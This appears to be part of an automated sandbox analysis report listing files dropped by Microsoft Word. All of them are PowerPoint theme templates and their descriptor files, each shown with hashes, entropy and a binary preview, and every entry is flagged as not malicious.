                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):570901
                                                                                                                            Entropy (8bit):7.674434888248144
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                            MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                            SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                            SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                            SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):282
                                                                                                                            Entropy (8bit):3.5459495297497368
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                            MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                            SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                            SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                            SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):558035
                                                                                                                            Entropy (8bit):7.696653383430889
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                            MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                            SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                            SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                            SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):276
                                                                                                                            Entropy (8bit):3.5361139545278144
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                            MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                            SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                            SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                            SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):924687
                                                                                                                            Entropy (8bit):7.824849396154325
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                            MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                            SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                            SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                            SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):282
                                                                                                                            Entropy (8bit):3.51145753448333
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                            MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                            SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                            SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                            SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.a.l.l.a.x...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1649585
                                                                                                                            Entropy (8bit):7.875240099125746
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                                                                                                                            MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                                                                                            SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                                                                                            SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                                                                                            SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):284
                                                                                                                            Entropy (8bit):3.5552837910707304
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXtLARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygymD0wbnKNAH/lMz1
                                                                                                                            MD5:5728F26DF04D174DE9BDFF51D0668E2A
                                                                                                                            SHA1:C998DF970655E4AF9C270CC85901A563CFDBCC22
                                                                                                                            SHA-256:979DAFD61C23C185830AA3D771EDDC897BEE87587251B84F61776E720ACF9840
                                                                                                                            SHA-512:491B36AC6D4749F7448B9A3A6E6465E8D97FB30F33EF5019AF65660E98F4570711EFF5FC31CBB8414AD9355029610E6F93509BC4B2FB6EA79C7CB09069DE7362
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .W.o.o.d._.T.y.p.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):966946
                                                                                                                            Entropy (8bit):7.8785200658952
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                            MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                            SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                            SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                            SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):282
                                                                                                                            Entropy (8bit):3.5323495192404475
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                            MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                            SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                            SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                            SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):976001
                                                                                                                            Entropy (8bit):7.791956689344336
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:zHM7eZGgFiHMRej4N9tpytNZ+tIw5ErZBImlX0m:zHM7eZGgFiHMRej++NZ+F5WvllZ
                                                                                                                            MD5:9E563D44C28B9632A7CF4BD046161994
                                                                                                                            SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                                                                                            SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                                                                                            SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):278
                                                                                                                            Entropy (8bit):3.5270134268591966
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXa3Y1kRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyt1mymD0wbnKNAH/lMz1
                                                                                                                            MD5:327DA4A5C757C0F1449976BE82653129
                                                                                                                            SHA1:CF74ECDF94B4A8FD4C227313C8606FD53B8EEA71
                                                                                                                            SHA-256:341BABD413AA5E8F0A921AC309A8C760A4E9BA9CFF3CAD3FB2DD9DF70FD257A6
                                                                                                                            SHA-512:9184C3FB989BB271B4B3CDBFEFC47EA8ABEB12B8904EE89797CC9823F33952BD620C061885A5C11BBC1BD3978C4B32EE806418F3F21DA74F1D2DB9817F6E167E
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.e.r.l.i.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1463634
                                                                                                                            Entropy (8bit):7.898382456989258
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                            MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                            SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                            SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                            SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):280
                                                                                                                            Entropy (8bit):3.5286004619027067
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                            MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                            SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                                                                                            SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                                                                                            SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Microsoft OOXML
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1204049
                                                                                                                            Entropy (8bit):7.92476783994848
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:+3zSQBxvOUIpHLYTCEmS1Wu09jRalJP3sdgnmAOFt0zU4L0MRx5QNn5:+bvI5UTCPu09qP3JPOFoR4N5
                                                                                                                            MD5:FD5BBC58056522847B3B75750603DF0C
                                                                                                                            SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                                                                                            SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                                                                                            SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                                                                                            Malicious:false
                                                                                                                            Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):276
                                                                                                                            Entropy (8bit):3.5364757859412563
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:Q+sxnxUXARkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnywMymD0wbnKNAH/lMz1
                                                                                                                            MD5:CD465E8DA15E26569897213CA9F6BC9C
                                                                                                                            SHA1:9EA9B5E6C9B7BF72A777A21EC17FD82BC4386D4C
                                                                                                                            SHA-256:D4109317C2DBA1D7A94FC1A4B23FA51F4D0FC8E1D9433697AAFA72E335192610
                                                                                                                            SHA-512:869A42679F96414FE01FE1D79AF7B33A0C9B598B393E57E0E4D94D68A4F2107EC58B63A532702DA96A1F2F20CE72E6E08125B38745CD960DF62FE539646EDD8D
                                                                                                                            Malicious:false
                                                                                                                            Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.a.v.o.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
